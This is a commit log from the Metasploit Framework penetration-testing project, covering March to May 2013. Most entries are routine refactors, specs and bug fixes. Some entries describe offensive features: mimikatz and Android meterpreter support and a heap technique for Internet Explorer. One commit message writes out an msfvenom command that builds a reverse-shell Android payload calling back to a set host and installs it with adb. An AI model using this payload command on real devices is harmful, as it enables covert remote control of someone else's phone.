Was calling .new instead of .create
[Story #49167601]
 2013-05-22 18:29:22 -05:00
xard4s 527f969d8d fix range 2013-05-22 18:28:14 -04:00
Luke Imhoff 2b70ec2e08 Payload compatible cache_in_memory 
[#47720609]

Msf::PayloadSet#add_module does NOT return an annotated module class as
Msf::ModuleSet#add_module does because a payload module is defined as a
ruby Module instead of a ruby Class.   Since add_module doesn't always
return an annotated_class, the logic in
Msf::ModuleManager#on_module_load needed to change to NOT use
annotated_class and create #add_module as return [void].  Thus, it is
necessary to pass in all the metasploit module metadata to
Msf::ModuleManager#cache_in_memory instead of assuming they can be
derived from the (payload) Module or (other) Class.
 2013-05-22 16:06:02 -05:00
David Maloney 69dd7f5c58 Update Mdm and Add Task stuff to report 
make report_* methods aware of Tasks

[Story #49167601]
 2013-05-22 14:59:43 -05:00
xard4s 314b0698ee address feedback 2013-05-22 13:44:25 -04:00
Luke Imhoff 57576de85f Update in-memory cache to fix file_changed? 
[#47720609]

Msf::ModuleManager#module_info_by_path was not being updated when a
module was loaded, so if a load_module was called again, say during
start up of prosvc, the module would reload even though there was no
change in the file because file_changed? couldn't find an entry for the
module's path in module_info_by_path.
 2013-05-22 12:28:42 -05:00
sinn3r e2aad8930d Landing #1853 - Remove ID tags 2013-05-22 12:12:55 -05:00
sinn3r 8483528ae0 Restore generic.rb to the correct state 2013-05-22 12:11:06 -05:00
sinn3r 1cf485fad1 Restore tcp.rb to its current state 2013-05-22 12:06:36 -05:00
sinn3r 162ecd7b45 Landing #1851 - Alias 'run' to 'exploit' 2013-05-22 11:56:04 -05:00
Luke Imhoff eede80509f Reuse appropriate terminology in docs 
[#47720609]

Fix some docs and variable names to make it clearer when methods are
expecting module instance and module classes.  Change some 'name'
variables to 'reference_name' since that's the proper terminology.
 2013-05-21 08:19:47 -05:00
James Lee f4498c3916 Remove $Id tags 
Also adds binary coding magic comment to a few files
 2013-05-20 16:21:03 -05:00
Luke Imhoff 89bd5b4791 Reset column information after running migrations 
[#50179803]
[SeeRM #7967]
[SeeRM #7870]

Because metasploit-framework runs migrations with the same process and
with the same connection as it later accesses the database, the column
information can become cached prematurely and be incorrect by the end of
the migrations.  Fix the bad cache by automatically resetting the column
information for all model classes after the migrations have run.
 2013-05-20 13:08:07 -05:00
Luke Imhoff 398dcfa8cb Merge branch 'master' into bug/migrations 2013-05-20 12:49:33 -05:00
Luke Imhoff 0e435d378c Move Msf::DBManager#migrate(d) to module 
[#50179803]

Move Msf::DBManager#migrate and the migrated attribute to
Msf::DBManager::Migration module to lower complexity of db_manager.rb
and in preparation for more migration related code on this branch.
 2013-05-20 12:45:17 -05:00
James Lee 5e65976089 Alias 'run' to 'exploit' 
Allows console users to use the 'run' command for exploits as well as
auxiliary and post, in the same way that 'exploit' works for all three.
Saves some typing and makes it do the right thing so users don't have to
remember what kind of module they're using.
 2013-05-20 11:20:12 -05:00
agix e48cfcae8e delete a debug puts 2013-05-19 19:21:10 +02:00
agix e844247163 Little change in exe-only to work with x64 arch. 2013-05-19 19:01:03 +02:00
John Sherwood b22c5a0120 Add sorting functionality to cmd_notes 
- Added sorting to cmd_notes
- Added make_sortable function so that sorts work happily even
  when the disparate notes don't have content of the same types
  in the fields the sort is requested over.
 2013-05-17 23:02:38 -04:00
Luke Imhoff 82867fbb66 Prevent duplicate migrations_paths 
[#50099107]

If Msf::DBManager#initialize_metasploit_data_models is run multiple
times, such as during specs, ActiveRecord::Migrator.migrations_paths was
getting populated with multiple copies of the metasploit_data_models
db/migrate path, which would lead to 'DB.migrate threw an exception:
Multiple migrations have the version number 0' errors in framework.log.
 2013-05-17 14:56:17 -05:00
Alexandre Maloteaux 2a9dbb2654 msfvenom and exe-small fmt bug fix 2013-05-16 21:13:45 +01:00
bannedit 031bb2eb0b Fix a backwards disasm bug which stomps on the depth option 2013-05-15 22:08:50 -04:00
James Lee 61afe1449e Landing #1275, bash cmdstager 
Conflicts:
	lib/rex/exploitation/cmdstager.rb

Conflict was just the $Id$ tag, which is no longer used anyway.
 2013-05-15 10:44:05 -05:00
Tod Beardsley 6457a968c9 Land #1829, uninvert note searching. 2013-05-15 07:14:19 -05:00
John Sherwood 063ef487e2 Fix typo in cmd_notes 2013-05-14 18:58:31 -04:00
sinn3r 2ee11f70f8 Landing #1824 - Support Python when generating payloads via msfpayload 
We love Python users too.
 2013-05-14 14:14:31 -05:00
Tasos Laskos 0a55c7e4b6 Proofs can be omitted if they contain sensitive data 2013-05-14 20:46:17 +03:00
Joshua J. Drake 96104c5860 Fix hard vs soft tabs 2013-05-13 20:44:51 -05:00
Joshua J. Drake c71b57764e Add a Python buffer formatter and update msfpayload to enable using it 2013-05-13 20:41:15 -05:00
Tasos Laskos a12e59ef1f Merge branch 'master' into bug/web-match_and_log_fingerprint 2013-05-14 01:55:37 +03:00
Tasos Laskos f4bc3096b2 #match_and_log_fingerprint: store match not fingerprint 2013-05-10 19:59:12 +03:00
Luke Imhoff afa04ac9d0 Merge branch 'master' into feature/mdm-module-namespace 2013-05-09 16:13:06 -05:00
Luke Imhoff bc92b43408 Update to metasploit_data_models 0.11.0 
[#47979793]
 2013-05-09 13:25:26 -05:00
sinn3r f9f769cec8 Landing #1805 - Fix unintelligible error when importing empty file 2013-05-08 20:10:45 -05:00
Luke Imhoff a5648a8830 Merge branch 'master' into feature/mdm-module-namespace 
Conflicts:
	Gemfile
	Gemfile.lock
	lib/msf/core/db_manager.rb
 2013-05-08 13:22:41 -05:00
James Lee 9ab68ac935 Fix unintelligible error when importing empty file 
IO#read returns nil for an empty file if given a length argument, which
caused a stack trace when attempting to import a file instead of a
useful error message.
 2013-05-07 18:05:45 -05:00
sinn3r fe57b9d6e2 Landing #1784 - Handles nils in params 
Nils are handled by converting values into strings
 2013-05-02 18:43:10 -05:00
James Lee 9e7885857c Land #1776, assembly payload blob cache fix 2013-05-02 16:58:14 -05:00
James Lee 0d9b120bac Get rid of the suffix 
This makes blob cache a little cleaner

[FixRM #7898]
 2013-05-02 16:55:14 -05:00
Meatballs 7fb092c58c Initial commit 2013-05-02 22:08:19 +01:00
jvazquez-r7 5cfc306466 Land @1785, @wchen-r7's API addition for the mstime ie8 technique 2013-05-02 00:00:49 -05:00
sinn3r 69f8103ffe Make animatecolor element optional by using innerHTML 2013-05-01 14:21:52 -05:00
sinn3r 3d2cb9ec3f Uses rand_text_hex for RGB values, and correcting exception handling 2013-05-01 13:41:36 -05:00
sinn3r 71afd762a9 According to MSFG, I can use RGB, so here goes 2013-04-30 18:48:21 -05:00
sinn3r ae94fbdf6c Updates documentation 2013-04-30 17:11:19 -05:00
sinn3r 9cc624456a Adds function js_mstime_malloc 
This function takes advantage of MSTIME's CTIMEAnimationBase::put_values
function that's suitable for a no-spray technique (based on wtfuzz's
PoC for MS13-008)
 2013-04-30 16:40:10 -05:00
xard4s 930c9dc835 undo free bsd error handling 2013-04-30 16:32:37 -04:00
Tasos Laskos 6bf19c6fb8 HTTP::ClientRequest: Should handle nils in params 
When hashes for params contain nils, they should be converted to empty
strings instead of crashing.

* #to_s: Calls #to_s on vars_get and vars_post data
* #set_encode_uri: Calls #to_s on its arg
 2013-04-30 22:01:00 +03:00
kernelsmith cf7702f7e9 "acitve" should be "aggressive" 
fixes http://dev.metasploit.com/redmine/issues/7926 which prevented a
proper search using:
msf> search exploit:type app:server
 2013-04-30 13:04:19 -05:00
Meatballs 293c847a32 Fix table.print 2013-04-29 22:02:41 -05:00
Meatballs 69dead8c8f Tidier 2013-04-29 23:17:11 +01:00
Meatballs 36ef2cb5a1 x86 warning for mimikatz 2013-04-29 23:14:32 +01:00
Meatballs 02788f71d9 Fix table.print 2013-04-29 22:37:02 +01:00
James Lee d53d6370b3 Land #1747, mimikatz meterpreter extension 
[Closes #1747]

See rapid7/meterpreter#9
 2013-04-29 14:45:07 -05:00
James Lee 906863676e Fix a logic error in HttpServer 
When a module is configured to listen on the INADDR_ANY interface, with
a payload that does not have an LHOST option, it attempts to determine
the srvhost from a client socket which would only be available when the
module has included the TcpClient mixin (i.e., it is both passive and
aggressive stance), causing a NameError for the undefined +sock+.

This commit fixes the problem in two ways:

1. It changes the default cli in get_uri to be the module's self.cli,
   which should always be set when passive modules would need it (e.g., in
   the on_request_uri method).

2. It adds a check to make sure that the calling module has a sock
   before trying to get its peerhost. This was @marthieubean's suggested
   solution in #1775.

[Closes #1775]
 2013-04-29 13:44:58 -05:00
Raphael Mudge 21f8e19d55 Single Payloads Cache Assembled Payload Improperly 
An earlier change to the framework (prepend_migrate) forced single
payloads to use the internal_generate method of payload.rb.

internal_generate calls build which has a cache to track assembled
payloads. This method assumes that a payload only needs to be
assembled once, with optional values patched in later.

Single payloads do not work this way. Each time they are generated
new assembly source is created with the options hardcoded in.

This fix updates build to use the hashcode of the assembly code as
part of the cache key.

This fixes #7898 -- a bug that prevents a user from generating
multiple variations of a single payload without a restart.
 2013-04-29 11:54:53 -04:00
sinn3r 1d9a695d2b Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238) 
[Closes #1772]
 2013-04-28 12:17:16 -05:00
Meatballs 8bfaa41723 Fix x64 dll creation 2013-04-27 20:44:46 +01:00
Meatballs bbd53a2dbd Add domain to get_cookies 2013-04-26 20:34:21 +01:00
Meatballs b25b9e769c Msftidy 2013-04-26 20:30:04 +01:00
Meatballs 1f2cab7aef Tidyup and getcookies 2013-04-26 20:26:04 +01:00
Luke Imhoff 249a09cd52 Update to metasploit_data_models 0.7.1 
[#47979793]
 2013-04-26 13:14:38 -05:00
Meatballs 9ad19ed2bf Final tidyup 2013-04-26 15:41:28 +01:00
Meatballs c7ac647e4e Initial attempt lfi 2013-04-26 14:32:18 +01:00
sinn3r b1e49e7116 Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master 2013-04-25 20:54:28 -05:00
sinn3r 5b0ae1476b Let's word this a little differently 2013-04-25 20:52:51 -05:00
Meatballs b58a775af5 Added opt delay to file_dropper 2013-04-25 20:52:51 -05:00
sinn3r 008266a581 Corrects documentation. Thanks Meatballs1 2013-04-25 19:13:16 -05:00
Meatballs d8430c83cf Add simple rspec 2013-04-26 00:47:00 +01:00
Meatballs 668dd78587 Msftidy 2013-04-26 00:21:31 +01:00
Meatballs e2bf4882f0 Add domain join parse 2013-04-26 00:20:10 +01:00
Meatballs 235887ccb5 Finished 2013-04-25 23:25:05 +01:00
sinn3r ff87e3622b Changes made according to feedback from Juan and James 2013-04-25 15:19:44 -05:00
Luke Imhoff 9207ed6532 Msf::Ui::Console::CommandDispatcher::Core#search_modules_sql spec 
[#47979793]
 2013-04-25 14:33:13 -05:00
James Lee 6767eee08a Add in-line signing 
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.

Example usage:
  ./msfvenom -p android/meterpreter/reverse_tcp \
    LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
  adb install ./meterp.apk
 2013-04-25 13:57:54 -05:00
Luke Imhoff 24b97137ea Msf::DBManager Mdm::Module* specs 
[#47979793]
 2013-04-25 09:46:53 -05:00
sinn3r 6642545551 Adds new JavaScript function "js_download" 
"js_download" is a JavaScript function used to download data (text
or binary) from the web server.
 2013-04-24 17:36:45 -05:00
James Lee 93bddd9041 Improved docs and partial specs for Rex::Text 
Conflicts:
	lib/msf/core/modules/loader/base.rb
	lib/rex/poly/block.rb
	lib/rex/text.rb
 2013-04-23 17:24:03 -05:00
xard4s cc52619a14 Fix trailing whitespace in zip files 2013-04-23 13:53:38 -04:00
Meatballs fab1781812 Refactored to send custom commands 2013-04-22 10:04:38 +01:00
Meatballs 6656514616 Msftidy 2013-04-21 14:34:47 +01:00
Meatballs fc621e8d7e Parse ssp correctly 2013-04-21 10:55:01 +01:00
Meatballs 83fbc3e46f Small fix and attribution to gentilkiwi 2013-04-21 00:36:43 +01:00
Luke Imhoff 492b081280 Msf::DBManager::Export#extract_module_detail_info spec 
[#47979793]
 2013-04-20 16:44:42 -05:00
Meatballs cec737d399 tidy and table header 2013-04-20 18:05:47 +01:00
Meatballs b219a23f00 Refactoring 2013-04-20 18:00:46 +01:00
Meatballs 20849714ac Add all methods 2013-04-20 17:27:32 +01:00
Meatballs ddaa09edad Added msv 2013-04-20 16:31:45 +01:00
Meatballs 83578dec68 Getprivs by default 2013-04-20 14:59:07 +01:00
Meatballs a23d7bb66f Add client UI and parse results 2013-04-20 12:20:38 +01:00
Meatballs 5fa81942db Initial comms 2013-04-19 22:19:50 +01:00
Luke Imhoff e5befb7094 Msf::DBManager#report_session specs 
[#47979793]
 2013-04-19 10:11:33 -05:00
Nathan Einwechter f8fc05bbf9 streamline var assignment 2013-04-18 17:05:28 -04:00
Nathan Einwechter c758831962 streamline var assignment 2013-04-18 17:04:03 -04:00
Nathan Einwechter d9187056c8 msftidy 2013-04-18 13:14:26 -04:00
Nathan Einwechter 288111be4e Fixes RM7883 along with related issue 
modified:   lib/msf/ui/console/command_dispatcher/db.rb
 2013-04-18 13:08:32 -04:00
Josh c23cf47d74 Fix RM7896, global show opts has non-eval #{text} 
thx to mudge for reporting & jduck for properly blaming me.
This change also causes the actual DefaultPromptChar to be displayed vs a hard coded ">"
 2013-04-15 22:07:28 -05:00
Tod Beardsley 25fcbd4e70 Landing #1733, setting a sensible heapsray offset 
@wchen-r7 says that nobody's using it today, much less relying on the
default, so this should make no functional difference to any browser
exploits.
 2013-04-15 16:32:48 -05:00
Tod Beardsley 4d21c7dff5 Landing #1727, adding @jlee-r7's new fingerprints 2013-04-15 13:49:59 -05:00
Tod Beardsley 7f8040c4e4 Lands #1722, Rex::Socket comment docs 2013-04-15 13:44:00 -05:00
Luke Imhoff 2c681005c0 Msf::ModuleManager::Cache spec coverage 
[#47979793]
 2013-04-15 13:08:12 -05:00
Meatballs 67791c12a5 Small tidy 2013-04-14 11:18:45 +01:00
Meatballs 26479bbe82 Fixup resolve_host 2013-04-14 10:58:51 +01:00
Meatballs 6a7fc70274 Remove length stuff 2013-04-14 10:54:19 +01:00
Meatballs 6bca2b305f Typo 2013-04-14 10:44:00 +01:00
Meatballs 849b42ffb9 Further tidy 2013-04-14 10:42:15 +01:00
Meatballs 4b4f77eb0f Finalize 2013-04-14 10:32:56 +01:00
timwr df9c5f4a80 remove unused resources and fix whitespace 2013-04-13 16:22:52 +01:00
scriptjunkie 2c41ca6598 Merge branch 'encoding_fix' of git://github.com/rsmudge/metasploit-framework 2013-04-12 21:10:44 -05:00
sinn3r d28db8a2a3 Forgot the comment 2013-04-12 20:21:10 -05:00
sinn3r f2cbbf43e8 Changes default offset 
Points to the beginning of the block
 2013-04-12 20:19:47 -05:00
timwr 32bd812bdb android meterpreter 2013-04-12 18:57:04 +01:00
James Lee 2c8ec656ca Typo 2013-04-11 22:36:08 -05:00
James Lee 7df80c7aac Add a couple new IE fingerprints to osdetect.js 2013-04-11 22:29:02 -05:00
RageLtMan 1e93ae65e3 fix typo in parameters 2013-04-11 19:12:32 -04:00
RageLtMan 5ac18e9156 commant update 2013-04-11 19:11:25 -04:00
RageLtMan 6eb33ae5ed Rex::Socket::SslTcp set cipher and verify_mode 
Update Rex::Socket::SslTcp to accept verification mode string from
Rex::Socket::Parameters, which has been modified accordingly.
Add SSLVerifyMode and SSLCipher options (params and socket work
were done before, but the option was not exposed) to
Msf::Exploit::Tcp.

Testing:
```
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'NONE')
>> sock.sslctx.verify_mode
=> 0
>> sock.close
=> nil
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'PEER')
=> #<Socket:fd 13>
>> sock.sslctx.verify_mode
=> 1
```

Note: this should be able to resolve the recent SSL socket hackery
of exploit/linux/misc/nagios_nrpe_arguments.
 2013-04-11 18:00:33 -04:00
James Lee 6a0b240d10 Add some better docs for Rex::Socket 2013-04-10 12:41:41 -05:00
Rob Fuller 2949c4a339 enable stage encoding for reverse_http(s) 2013-04-10 12:10:17 -03:00
Tod Beardsley 6a5d318749 Bumping version. 2013-04-10 08:59:56 -05:00
Meatballs e4ff7a2f2c Address egypt's feedback 2013-04-09 21:15:04 +01:00
sinn3r 277bc69140 Merge branch 'bug/rm7288-post-rename' of github.com:jlee-r7/metasploit-framework into jlee-r7-bug/rm7288-post-rename 2013-04-08 10:18:09 -05:00
Meatballs 3660ad8c0a Initial attempt 2013-04-07 23:03:43 +01:00
Tod Beardsley bbce53816c Merges #1706, removing gemcache per brandont 
This has been put off for a long while.
 2013-04-05 10:12:04 -05:00
James Lee cd86a69090 Have Post::File use shiny new session.fs.file.mv 
Also adds a quick and dirty test. Verified working on Linux shell, Linux
meterpreter, and Windows x86 and x64 meterpreter.
 2013-04-05 01:24:24 -05:00
James Lee 067140643e Landing #1579, meterpreter mv 
See rapid7/meterpreter/#6
 2013-04-04 23:42:31 -05:00
James Lee ad46b46684 Landing #1463, Meatballs' cdecl fixes 2013-04-04 22:58:59 -05:00
Brandon Turner 6251dd571e Always use bundler to load gems 2013-04-04 16:41:40 -05:00
Brandon Turner 06537e0ab1 Remove the gemcache loader and tools 2013-04-03 16:24:56 -05:00
Brandon Turner 8ceede6460 Remove the gemcache 2013-04-03 16:24:55 -05:00
Luke Imhoff 809969b49f Merge branch 'master' into feature/patchable-web-vuln-import 2013-04-02 22:38:54 -05:00
Luke Imhoff 47842aa6a2 Fix 'Output is not a module' 
[#46491831]

I missed that Rex::Ui::Text::Output was a class and not a module, so
starting up prosvc fell over when it loaded
rex/ui/text/output/buffer/stdout, which also would screw up
msf/ui/console/command_dispatcher/core.rb where I original added
Rex::Ui::Text::Output::Buffer::Stdout.
 2013-04-01 20:16:28 -05:00
Tasos Laskos f1bc4a76c5 Anemone::Page#links: removed upwards dir traversal 
[Finishes #47241427]
 2013-04-02 00:49:40 +03:00
Luke Imhoff 0bb79ba890 Msf::DBManager#import_msf_xml refactor 
[#46491831]

Move Msf::DBManager#import_msf_xml into
Msf::DBManager::ImportMsfXml#import_msf_xml and include
Msf::DBManager::ImportMsfXml to cut down size of the infamous db.rb.
Break up #import_msf_xml to have separate methods for parsing web_forms,
web_pages, and web_vulns.  The method for
web_vulns, #import_msf_web_vuln_element is needed so that it can be overridden in
Pro to handle the Pro-only changes to Mdm::WebVuln.
 2013-04-01 16:06:40 -05:00
Luke Imhoff 2317e9cced Fix yard tag warnings 
[#46491831]
 2013-03-30 17:13:12 -05:00
Luke Imhoff 7ed2812ec3 Fix Cannot resolve link YARD warnings 
[#46491831]
 2013-03-30 16:58:49 -05:00
Luke Imhoff bc4b87ebd9 Fix Undocumentable method defined on object instance YARD warnings 
[#46491831]

Change code to use format that YARD can document without changing
semantics.
 2013-03-30 16:05:12 -05:00
Luke Imhoff c210260845 Fix Undocumentable method, missing name YARD warning 
[#46491831]

Comments at the start of the file with ## caused YARD to think the
comment was documenting the require call.  By removing the ##, the
warning disappeared.  I did not determine what is special about ## in
file comments.
 2013-03-30 15:32:38 -05:00
Tasos Laskos e9b183cda2 Anemone::Page#links: restored upwards dir traversal 
[FIXRM #7853]
 2013-03-29 23:07:46 +02:00
sinn3r 463725efec Merge branch 'bug/winrm_poke' of github.com:dmaloney-r7/metasploit-framework into dmaloney-r7-bug/winrm_poke 2013-03-29 09:30:21 -05:00
RageLtMan 0adb30c87a whitespace cleanup 2013-03-28 04:11:52 -04:00
RageLtMan ed3b1cecd4 Rex::Text::Ui::Table.new[find_by_colnames] 
Add :[] to ...Ui::Table allowing user to pass multiple colnames.
Returns a new table with only those columns and their rows.

Useful when using Rex to filter output, prep CSV, etc.

Testing:
```
t = Rex::Ui::Text::Table.new('Columns' => ['a','b','c'])
t << ['x','y','z']
t << ['p','q','r']
t['a','c']

=> a  c
-  -
p  r
x  z
```
 2013-03-28 04:02:31 -04:00
scriptjunkie 79a72a18a9 Merge branch 'exe_only_patch' of git://github.com/agix/metasploit-framework 2013-03-27 18:30:07 -05:00
sinn3r 7bf87f3546 Merge branch 'mipsbe_elf' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-mipsbe_elf 2013-03-27 11:55:09 -05:00
Tasos Laskos 380f5f56ae Auxiliary::Web::HTTP#_request: print_error => elog 
[SEERM #7839]

Reverted earlier commit.
 2013-03-27 16:36:50 +02:00
David Maloney a87e414274 fix winrm poke method 2013-03-26 13:05:33 -05:00
jvazquez-r7 a644ceb016 Added support for mipsbe elf 2013-03-26 17:20:43 +01:00
jvazquez-r7 4fff624632 added initial support for ELF misple 2013-03-26 01:08:31 +01:00
David Maloney 509ae76dc9 make sure we grab the workspace for store_local 
store_local calls report note from db.rb directly instead of going
through the report method. this means we might miss the workspace
causing a stack trace
 2013-03-22 16:52:38 -05:00
sinn3r 0634cb9892 Need to avoid badchar 0x00 
0x00 becomes double null, which functions like a terminator
 2013-03-22 13:18:32 -05:00
sinn3r 566806487c Randomize the "div_container" var because it's global 
It's best to randomize this variable name because it's global.
 2013-03-22 13:16:14 -05:00
sinn3r 1ac31a3e12 Merge branch 'bug/web-path-api-update' of github.com:tasos-r7/metasploit-framework into tasos-r7-bug/web-path-api-update 2013-03-22 12:54:23 -05:00
Tod Beardsley bf85545b4d Fix egypt's typo 2013-03-20 17:15:14 -05:00
Brandon Turner 49963ad4f1 Update MDM in gemcache 2013-03-20 13:23:40 -05:00
sinn3r cce74246d8 Merge branch 'master' of github.com:rapid7/metasploit-framework 2013-03-19 15:03:24 -05:00
Tod Beardsley 6618c098c4 Merges 'bug/obsolete-activerecord-patch' 
Not only does this remove the patch, but adds in specs to cover the test
cases that the patch resolved. Verified all steps and landed #1592 before
landing #1611, so this is complete.

[Closes #1611]
 2013-03-19 13:10:42 -05:00
Tod Beardsley d987693238 Merges 'feature/rake-db' 
Implements rake db tasks for Metasploit Framework. Woot! Verified all
steps listed in #1592 as well.

[Closes #1592]
 2013-03-19 12:56:59 -05:00
Tasos Laskos 11c38d925b Auxiliary::Web::Path: Fuzzable API update 
[FIXRM #7817]

Path object was using an outdated fuzzable API which was causing
scan errors.
 2013-03-19 18:41:52 +02:00
Tasos Laskos ad39a5cdc3 Auxiliary::Web::HTTP#_request: elog => print_error 
[SEERM #7815]

Switched form elog to print_error to make reporting bugs easier on users.
 2013-03-19 17:18:44 +02:00
Tod Beardsley 1873053a34 Restore win32pe as the default (not _only) 2013-03-18 15:55:01 -05:00
Tod Beardsley 3a183ffa94 Retabbed for consistent whitespace 2013-03-18 15:40:26 -05:00
Tod Beardsley 418a373f6c Avoid merge conflict over Id SVN tag 2013-03-18 15:39:16 -05:00
Tod Beardsley afcbaffa2b Revert "add -R capability like hosts -R" 
Pulling out the set_rhosts_from_addrs -- that's not required for
grep-like functionality, and adding this method to the global namespace
is undesirable.

This reverts commit 52596ae3b4.
 2013-03-18 15:28:19 -05:00
Tod Beardsley 91e3f4cca6 Merge 'kernelsmith/msfconsole-grep' 
Resolved a conflict between grep and go_pro (go_pro was added after
grep). Adds @kernelsmith's grep command. Josh is determined to have
msfconsole be his default shell, it seems.

[Closes #1320]

Conflicts:
	lib/msf/ui/console/command_dispatcher/core.rb
 2013-03-18 14:39:45 -05:00
Luke Imhoff 2075a7b46c Remove active_record patch 
[#46141013]

Version 3.2.12 of activerecord contains the changes that the original
patch made so the patch is no longer needed.
 2013-03-18 11:32:21 -05:00
Luke Imhoff f1a4fd937a Specs for activerecord patch 
[#46141013]

Spec the desired behavior for ConnectionPool prior to removing the patch
to sync with upstream 3.2.12.
 2013-03-18 11:01:45 -05:00
Meatballs f9327d169b msftidy 2013-03-17 14:31:40 -04:00
Meatballs b6da5f84bb Refactor 2013-03-17 14:09:00 -04:00
Luke Imhoff 2604fad164 Allow use of rake db tasks 
[#46224565]

The following rake tasks are added and work similar to how they work in
rails apps:
* db:create
* db:drop
* db:migrate
* db:migrate:status
* db:rollback
* db:schema:dump
* db:schema:load
* db:seed (but no db seeds defined at this time)
* db:setup
* db:version

The hidden task db:test:prepare is also available, which means `rake
spec` can depend on it so that the test database is dropped and
recreated from the development database when running specs (Although
there are yet to be database tests, this branch is in preparation for
that work that will be split between multiple developers.)
 2013-03-14 15:46:18 -05:00
Tod Beardsley f46ec73ff0 Fix up usage help for loot cmd 2013-03-14 14:37:15 -05:00
Tod Beardsley 3dca63fee2 Make it clear that you're deleting all loot 
You don't get to delete just one chunk of loot.
 2013-03-14 14:37:15 -05:00
Joshua Abraham 56611230ff fixed header 2013-03-14 14:37:15 -05:00
Joshua Abraham 0ca0cd5ee1 loot add/remove command for msfconsole 2013-03-14 14:37:15 -05:00
Tasos Laskos 5967991f6f Auxiliary::Web#log_*: details[:category] => #name 
Recent category updates to modules caused variations of vulns of the
same type to be ignored leading to a smaller exploitation surface.
Thus, use the #name of the module as the key instead of the category name.
 2013-03-12 19:43:47 +02:00
James Lee 32bf7cf8f4 Merge remote-tracking branch 'tasos-r7/bug/web-fuzzable-path' into rapid7 
[Closes #1578]
 2013-03-12 12:31:32 -05:00
RageLtMan d399093d80 Add Framework side of stdapi.fs.file.mv 
Add the appropriate methods to Rex side of the FS extension and
the commensurate command dispatcher.

Requires https://github.com/rapid7/meterpreter/pull/6 from the
meterpreter repo as well as compiling fresh DLL for
ext_server_stdapi.
 2013-03-12 02:06:38 -04:00
Tasos Laskos c641ca96c1 Auxiliary::Web::Path.from_model: inputs => form.inputs 
Fixed uninitialized variable error.
 2013-03-11 23:08:41 +02:00
Raphael Mudge d764740779 Convert user/pass tokens to ASCII in db.rb 
This commit fixes an Encoding::CompatibilityError incompatible
encoding regexp match (ASCII-8BIT regexp with UTF-8 string) when
sanitizing non-printable tokens from a user/pass string.

The UTF-8 strings are derived from strings passed through the
module.execute RPC call.
 2013-03-11 15:02:28 -04:00
jvazquez-r7 f0cee29100 modified CommandDispatcher::Exploit to have the change into account 2013-03-11 18:08:46 +01:00
Meatballs 756dec6fcc Msftidy EXE 2013-03-10 20:56:21 +00:00
Meatballs 71a38b81dd Added generation to Exploit::EXE 2013-03-10 20:54:37 +00:00
dmaloney-r7 87f84513bf Merge pull request #1564 from rapid7/feature/metasploit_data_models-0.6.2 
Update to metasploit_data_models 0.6.2
 2013-03-09 13:49:48 -08:00
Meatballs 3acb2f561a Retab 2013-03-09 17:59:20 +00:00
Meatballs 465c00c5ff Msftidy msi sections 2013-03-09 17:25:59 +00:00
Meatballs f37d9c2834 Initial commit 2013-03-09 17:24:03 +00:00
Spencer McIntyre bf54b582c9 Condense the decoder commands 2013-03-08 16:29:03 -05:00
Tasos Laskos 7e15788bb5 Auxiliary::Web: updated form of vuln storage in parent 
#log_fingerprint and #log_resource now create a key in the
parent's #vulns attribute with the name of the vuln type and
store the details of each such vuln under it.
 2013-03-08 22:38:23 +02:00
Spencer McIntyre 8b5a83c7f5 Remove the DECODER option 2013-03-08 15:25:16 -05:00
Tasos Laskos ac6065d8f9 Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging 2013-03-08 21:50:49 +02:00
Tasos Laskos 3422a7c098 Auxiliary::Web: force vuln proof to_s 2013-03-08 21:50:01 +02:00
Spencer McIntyre aceba9fc8a Revert "escape ticks and spaces in paths" 
This reverts commit 4c87b1ba36.
 2013-03-08 14:37:28 -05:00
James Lee 0a9b00e24c Apparently missed part of mubix's original changes 
Used by auxiliary/admin/smb/list_directory
 2013-03-07 21:20:46 -06:00
Luke Imhoff 397361f5c6 Update gemcache to metasploit_data_models 0.6.2 2013-03-07 20:41:33 -06:00
James Lee db676f1a88 Whitespace at EOL 2013-03-07 18:20:08 -06:00
James Lee c3fa62cd59 Whitespace at EOL 2013-03-07 18:16:57 -06:00
Brandon Turner 725fbea851 Merge pull request #1563 from rapid7/bug/yard-guard 
[Story #45771305]

Conflicts:
	Rakefile
 2013-03-07 17:35:03 -06:00
James Lee 43c076ed96 Merge remote-tracking branch 'tasos-r7/bug/web-vuln-logging' into rapid7 
[Closes #1559]
 2013-03-07 17:23:59 -06:00
Luke Imhoff e912bec2db Update gemcache to metasploit_data_models 0.6.1 
[#45771305]
 2013-03-07 14:30:29 -06:00
Meatballs df3361df50 Merge branch 'master' into wds_scanner_repull 2013-03-07 20:09:44 +00:00
James Lee f05431791f Merge branch 'dmaloney-r7-feature/ssl/add_cipher_support' into rapid7 2013-03-07 12:54:39 -06:00
James Lee 27f43d3d1c Param name goes before type 2013-03-07 12:50:43 -06:00
James Lee c41bfa9141 Whitespace 2013-03-07 12:45:01 -06:00
Tasos Laskos cf3df4b179 Auxiliary::Web::HTTP: added error output 
Instead of using elog when an HTTP request callback throws an
exception, use the HTTP class' parent #print_error.
 2013-03-07 20:14:38 +02:00
David Maloney 06443ea4d0 yarddoc cleanup 2013-03-07 11:52:58 -06:00
David Maloney 007b26d918 dry up enumerators 2013-03-07 11:35:34 -06:00
David Maloney 7332d31523 fix some style things for egypt 2013-03-07 11:11:48 -06:00
Tasos Laskos c3b3da4254 Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging 2013-03-06 23:04:10 +02:00
James Lee 5dff043e3c Whitespace 2013-03-06 14:52:32 -06:00
Tasos Laskos d9a6f5f0ca Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging 2013-03-06 18:26:18 +02:00
Tasos Laskos c497d5ffef Auxiliary::Web: log methods pass vuln info to parent 2013-03-06 18:25:25 +02:00
Samuel Huckins 09fc52f3d9 Merge pull request #1536 from rapid7/feature/active-record-migrator-migrations-paths 
Use ActiveRecord::Migrator  multiple migrations paths support
 2013-03-06 08:20:36 -08:00
Luke Imhoff fac941aae4 Update gemcache with metasploit_data_models 0.6.0 
[#44034071]
 2013-03-06 09:59:09 -06:00
